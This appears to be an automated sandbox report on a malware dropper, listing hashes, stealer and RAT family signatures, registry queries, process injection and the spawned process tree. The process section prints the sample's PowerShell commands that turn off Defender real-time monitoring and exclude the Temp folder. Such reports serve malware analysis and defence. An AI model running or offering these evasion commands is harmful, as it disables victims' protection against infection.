SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

memory/1500-228-0x0000000000400000-0x000000000089B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ab31342d1577fbf35832794ed7ab952
SHA1 85c2d3f12c860791ee4aac97d54d8254f66b5c40
SHA256 1d38ec9d273d2c68ffd4557d20c4410cfaf1888842f865e26056f17acf459c86
SHA512 a8bdf994a2faff81d11fe8292fbb34300513ccc18f02ba5963b788f8ceb42eee0aca5902bb5d2babcea43f9e4d93cc97ff4725be4476a80be0f1f0caffdf6c56

memory/2420-232-0x0000000003740000-0x00000000037E5000-memory.dmp

memory/2420-236-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/2420-233-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/3380-237-0x0000000000400000-0x000000000054C000-memory.dmp

memory/2420-238-0x0000000000400000-0x0000000000602000-memory.dmp

memory/3380-239-0x0000000003140000-0x00000000031E5000-memory.dmp

memory/3380-243-0x00000000031F0000-0x0000000003282000-memory.dmp

memory/3380-240-0x00000000031F0000-0x0000000003282000-memory.dmp

memory/3144-244-0x0000000000400000-0x000000000054C000-memory.dmp

memory/3144-253-0x00000000036D0000-0x0000000003775000-memory.dmp

memory/3144-257-0x0000000003780000-0x0000000003812000-memory.dmp

memory/3144-254-0x0000000003780000-0x0000000003812000-memory.dmp

memory/2420-259-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/3380-267-0x00000000031F0000-0x0000000003282000-memory.dmp

memory/1476-270-0x00000000022A0000-0x00000000023EC000-memory.dmp

memory/1476-273-0x00000000022A0000-0x00000000023EC000-memory.dmp

memory/3144-275-0x0000000003780000-0x0000000003812000-memory.dmp

memory/1476-279-0x0000000002BD0000-0x0000000002C75000-memory.dmp

memory/1476-280-0x0000000002C80000-0x0000000002D12000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

77s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
PID 1752 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
PID 1752 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
PID 2600 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1484 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 4356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
PID 2528 wrote to memory of 4356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
PID 2528 wrote to memory of 4356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
PID 2976 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
PID 2976 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
PID 2068 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
PID 2068 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
PID 2068 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
PID 5112 wrote to memory of 1156 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
PID 5112 wrote to memory of 1156 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
PID 1256 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
PID 1256 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
PID 1256 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2600 -ip 2600

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

